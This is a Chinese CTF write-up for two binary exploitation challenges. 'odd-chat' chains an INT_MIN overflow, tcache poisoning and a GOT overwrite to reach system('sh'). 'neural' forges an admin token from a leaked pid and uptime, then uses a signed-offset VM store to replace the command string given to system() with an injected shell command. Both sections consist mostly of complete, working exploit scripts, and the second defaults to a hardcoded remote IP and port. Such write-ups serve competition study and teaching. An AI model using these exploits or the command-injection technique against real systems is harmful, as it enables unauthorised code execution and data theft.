一言难尽,这比赛ak居然还进不了线下?
odd-chat
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
程序是一个聊天菜单:
ChatChange nameView chat historyClear chatQuit
全局区里有几个关键变量:
0x6020d8:聊天链表头0x6020e8:消息计数0x6020f0:name_ptr0x602100:初始名字缓冲区
每条聊天消息 malloc(0x20),布局可以看成:
struct msg {
char data[0x18];
void *next;
};
消息读入后不会原样保存,而是按 8 字节一组做一轮自定义 TEA 变种加密。
漏洞在于-2147483648 导致长度检查失效
Chat 里会先读一个整数长度,然后做一套“绝对值 + 取模 24”的处理
正常情况下它想把长度限制到 0~23。但如果输入:
-2147483648
也就是 INT_MIN,有符号整型的“取绝对值”会溢出,结果仍然是负数。最后得到的长度会变成 -8
后面的读入函数使用的是无符号比较:
while (idx < len) { ... }
因此 len = -8 会被当成一个极大的无符号数,直到读到换行为止,形成可控溢出
溢出发生后,程序还会对消息缓冲区做原地加密
这意味着如果我们想把某个 8 字节值最终写成 X,实际输入的不能直接是 X,而要先算出对应的“加密前明文”。也就是:
input_block = decrypt(target_block)
solve.py 里的 decrypt_block() 就是做这件事的
clear chat 可以 free 伪造 chunk
链表清空逻辑会:
- 取当前节点
- 读
next free(当前节点)- 继续处理下一个节点
如果我们把某条消息的 next 指针溢出改掉,就能让程序去 free 一个我们伪造的地址。
而初始名字缓冲区 0x602100 是可写的,所以可以直接在这里伪造一个 size=0x31 的 fake chunk:
0x602100: prev_size = 0
0x602108: size = 0x31
0x602110: user data
然后把第一条消息的 next 指针改成 0x602110,这样 clear chat 时就会把这个 fake chunk 丢进 tcache[0x30]
glibc 2.27 没有 safe-linking,这一步非常关键
change name 是稳定任意写原语
Change name 本质上是:
fgets(name_ptr, 0x30, stdin);
只要我们能把 name_ptr 改掉,就能得到一个稳定的 0x2f 字节写
整体利用链:
- 在
0x602100伪造 fake chunk - 用
INT_MIN触发溢出,把第一条消息的next改成0x602110 clear chat,把 fake chunk free 进tcache[0x30]- 用
change name覆盖已释放 fake chunk 的fd,把它 poison 到0x6020f0 - 第一次
malloc(0x20)取走 fake chunk - 第二次
malloc(0x20)直接拿到0x6020f0这块全局区域 - 覆盖
name_ptr = atoi@got,随后程序打印用户名时泄露atoi实际地址 - 计算 libc 基址,得到
system - 再次
change name,把atoi@got改成system - 菜单输入
sh,实际执行的是system("sh"),拿 shell
exp
import os
from pathlib import Path
from pwn import *
context.arch = "amd64"
context.log_level = "debug"
BASE = Path(__file__).resolve().parent
elf = context.binary = ELF(str(BASE / "attachment"))
remote_libc = ELF(str(BASE / "libc.so.6"))
LOCAL_LD = "/lib64/ld-linux-x86-64.so.2"
FAKE = 0x602110
OVLP = 0x6020F0
def start():
if args.REMOTE:
return remote(args.HOST or "127.0.0.1", int(args.PORT or 1337))
env = dict(os.environ)
tunables = env.get("GLIBC_TUNABLES", "")
extra = "glibc.malloc.tcache_count=0:glibc.malloc.check=0"
env["GLIBC_TUNABLES"] = f"{tunables}:{extra}" if tunables else extra
ld_path = str(args.LD or LOCAL_LD)
log.info("use local ld: " + ld_path)
return process([ld_path, str(BASE / "attachment")], cwd=str(BASE), env=env)
def pick_libc():
if args.REMOTE:
return remote_libc
for p in ["/lib/x86_64-linux-gnu/libc.so.6", "/lib64/libc.so.6"]:
if Path(p).exists():
log.info("use local libc: " + p)
return ELF(p, checksec=False)
log.warning("no local libc found, fallback to ./libc.so.6")
return remote_libc
def dec8(x):
v0 = u32(x[:4])
v1 = u32(x[4:])
key = 0x114514
delta = 0x9E3879B9
s = (delta * 17) & 0xFFFFFFFF
for _ in range(17):
v1 = (v1 - (((v0 << 4) + key) ^ (s + v0) ^ ((v0 >> 5) + key))) & 0xFFFFFFFF
s = (s - delta) & 0xFFFFFFFF
v0 = (v0 - (((v1 << 4) + key) ^ (s + v1) ^ ((v1 >> 5) + key))) & 0xFFFFFFFF
return p32(v0) + p32(v1)
def pwn(io):
libc = pick_libc()
# 初始 name,伪造 chunk 头
fake = p64(0) + p64(0x31) + p64(0) + p64(0) + p64(0) + b"\x00" * 7
io.sendafter(b"Please enter your name: ", fake)
# 让 message 指针指向 FAKE
io.sendlineafter(b">> ", b"1")
io.sendlineafter(b"How many characters do you want to send: ", b"-2147483648")
io.sendafter(b"> ", b"A" * 0x18 + dec8(p64(FAKE)) + b"\n")
io.recvuntil(b">> ")
# clear history 触发 free
io.sendline(b"4")
io.recvuntil(b">> ")
# 覆盖 name 指针到可重叠区域
poison = b"B" * 0x10 + p64(OVLP) + b"C" * (0x2F - 0x10 - 8)
io.sendline(b"2")
io.sendafter(b"Please enter your name: ", poison)
io.recvuntil(b">> ")
# 走一次空发送,整理状态
io.sendline(b"1")
io.sendlineafter(b"How many characters do you want to send: ", b"0")
io.recvuntil(b">> ")
# 重叠写,读出 atoi@got
payload = b"".join(
[
dec8(p64(elf.got["atoi"])),
dec8(b"D" * 8),
dec8(b"E" * 8),
dec8(p64(0)),
]
)
io.sendline(b"1")
io.sendlineafter(b"How many characters do you want to send: ", b"-2147483648")
io.sendafter(b"> ", payload + b"\n")
io.recvuntil(b"User: ")
atoi = u64(io.recvuntil(b"> ", drop=True).ljust(8, b"\x00"))
libc.address = atoi - libc.sym["atoi"]
log.success("atoi: " + hex(atoi))
log.success("libc: " + hex(libc.address))
log.success("system: " + hex(libc.sym["system"]))
# 把 name 内容改成 system
io.recvuntil(b">> ")
io.sendline(b"2")
io.sendafter(b"Please enter your name: ", p64(libc.sym["system"]) + b"Z" * (0x2F - 8))
# 输入 sh,相当于 system("sh")
io.sendlineafter(b">> ", b"sh")
io.interactive()
if __name__ == "__main__":
io = start()
pwn(io)
neural
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Stripped: No
这题表面上是一个 Web 聊天系统,实际是Flask 暴露 HTTP 接口
Flask 通过 Unix Socket 把请求转给 engine
engine 里真正有漏洞的部分是 CMD_ADMIN
前端里最关键的是这个接口:
@app.route('/api/raw', methods=['POST'])
def raw_command():
...
command = raw_data[0]
payload = raw_data[1:]
status, data = send_to_engine(command, payload)
也就是说,只要能访问 /api/raw,就能直接构造后端协议包,根本不需要局限在前端已经封装好的几个正常功能
后端协议格式很简单:
u32 total_len | u8 command | payload
其中 CMD_ADMIN = 0xff
而远端实际连上之后会发现这个端口暴露的是 Flask HTTP,而不是直接暴露 engine所以远端利用应该走:
/api/status/api/raw/api/download
CMD_STATUS 返回:
{"status":"running","pid":...,"uptime":...,"sessions":...,"model_loaded":...}
这两个值非常关键:
piduptime
因为 engine 启动时会做:
g_pid = getpid()g_start_time = time(NULL)derive_admin_key(g_pid, g_start_time, g_pwn)
也就是说,admin 使用的秘密材料并不是随机数,而是由可推测信息生成出来的
verify_admin_token() 的逻辑本质是:
if (abs(time(NULL) - timestamp) > 60) return 0;
sha256(
timestamp ||
sub_cmd ||
payload ||
g_pwn[0:16]
) == token
其中 g_pwn[0:16] 是 derive_admin_key(pid, start_time) 的结果
而 start_time 又满足:
start_time ~= current_time - uptime
所以拿到 /api/status 之后,只需要在一个很小的时间窗口里爆几个 start_time 候选,就能把 secret 还原出来
远端这里还有一个小细节很好用:HTTP 响应头自带 Date
所以可以直接用服务端返回的时间来推算 start_time,比用本地时间更稳
handle_admin(sub_cmd = 5) 的关键逻辑是:
execute_vnm(payload)system(g_pwn + 0x10)
g_pwn + 0x10 初始内容是:
/opt/neuralchat/plugins/diag.sh
所以这一步本来是想执行诊断脚本。
但是 VNM 里有一个很危险的指令,语义可以看成:
store_dword(g_pwn + 0x90 + (int8_t)offset, regs[reg_index]);
这里的 offset 是 有符号字节
如果取:
offset = -0x80
那写入位置就是:
g_pwn + 0x90 - 0x80 = g_pwn + 0x10
也就是刚好把 system() 要执行的那段字符串改掉
这题根本不需要把 VNM 全部实现出来,只用两条指令就够了:
opcode 0x02:把一个 imm32 装进寄存器
opcode 0x07:把寄存器里的 4 字节写到 g_pwn + 0x90 + signed_offset
所以做法就是:
- 准备想执行的 shell 命令,比如:
cat /home/ctf/flag>/opt/neuralchat/downloads/flag_xxx.txt\x00
- 每 4 字节切一块。
- 每块先
load imm32,再store到目标偏移。 - 最后追加
0xff结束 VNM。
这样 VNM 执行完之后,system(g_pwn + 0x10) 实际执行的就不再是 diag.sh,而是我们自己的命令
远端因为暴露的是 Flask,所以利用链是:
GET /api/status- 根据
pid + uptime + Date还原 admin secret POST /api/raw发送CMD_ADMINGET /api/download?file=...取回落地的 flag
#!/usr/bin/env python3
import argparse
import base64
import json
import struct
import time
import urllib.error
import urllib.parse
import urllib.request
from email.utils import parsedate_to_datetime
from pathlib import Path
from solve_local import (
ADMIN_RUN_DIAG,
CMD_ADMIN,
derive_admin_secret,
build_admin_token,
build_vnm_writer,
)
def request_json(base_url: str, path: str, payload: dict | None = None) -> tuple[dict, object]:
body = None
headers = {}
if payload is not None:
body = json.dumps(payload).encode("utf-8")
headers["Content-Type"] = "application/json"
request = urllib.request.Request(
urllib.parse.urljoin(base_url, path),
data=body,
headers=headers,
method="POST" if payload is not None else "GET",
)
with urllib.request.urlopen(request, timeout=10) as response:
return json.loads(response.read().decode("utf-8")), response.headers
def raw_command(base_url: str, command: int, payload: bytes = b"") -> tuple[int, bytes]:
raw = bytes([command]) + payload
body, _ = request_json(
base_url,
"/api/raw",
{"data": base64.b64encode(raw).decode("ascii")},
)
if "data" not in body:
raise RuntimeError(f"raw command failed: {body}")
decoded = base64.b64decode(body["data"])
if not decoded:
raise RuntimeError("empty raw response")
return decoded[0], decoded[1:]
def fetch_remote_time(headers: object) -> int:
date_value = headers.get("Date")
if not date_value:
return int(time.time())
return int(parsedate_to_datetime(date_value).timestamp())
def fetch_file(base_url: str, filename: str) -> bytes | None:
url = urllib.parse.urljoin(
base_url,
"/api/download?" + urllib.parse.urlencode({"file": filename}),
)
try:
with urllib.request.urlopen(url, timeout=10) as response:
return response.read()
except urllib.error.HTTPError as exc:
if exc.code == 404:
return None
raise
def exploit(base_url: str) -> str:
status, headers = request_json(base_url, "/api/status")
remote_now = fetch_remote_time(headers)
pid = int(status["pid"])
uptime = int(status["uptime"])
filename = f"flag_{int(time.time())}.txt"
command = (
f"cat /home/ctf/flag>/opt/neuralchat/downloads/{filename}\x00"
).encode("ascii")
vnm_payload = build_vnm_writer(command)
base_start = remote_now - uptime
last_error = None
for start_time in range(base_start - 8, base_start + 9):
secret = derive_admin_secret(pid, start_time)
timestamp = remote_now
token = build_admin_token(timestamp, ADMIN_RUN_DIAG, vnm_payload, secret)
admin_payload = (
struct.pack("<I", timestamp)
+ bytes([ADMIN_RUN_DIAG])
+ token
+ vnm_payload
)
status_code, response = raw_command(base_url, CMD_ADMIN, admin_payload)
last_error = (start_time, status_code, response)
if status_code == 0:
file_data = fetch_file(base_url, filename)
if file_data is not None:
return file_data.decode("utf-8", errors="replace").strip()
raise RuntimeError(f"remote exploit failed, last response={last_error!r}")
def main() -> int:
parser = argparse.ArgumentParser(description="Exploit the NeuralChat remote service")
parser.add_argument("host", nargs="?", default="47.93.33.240")
parser.add_argument("port", nargs="?", type=int, default=20492)
args = parser.parse_args()
base_url = f"http://{args.host}:{args.port}"
print(f"[*] Target: {base_url}")
flag = exploit(base_url)
print(flag)
return 0
if __name__ == "__main__":
raise SystemExit(main())









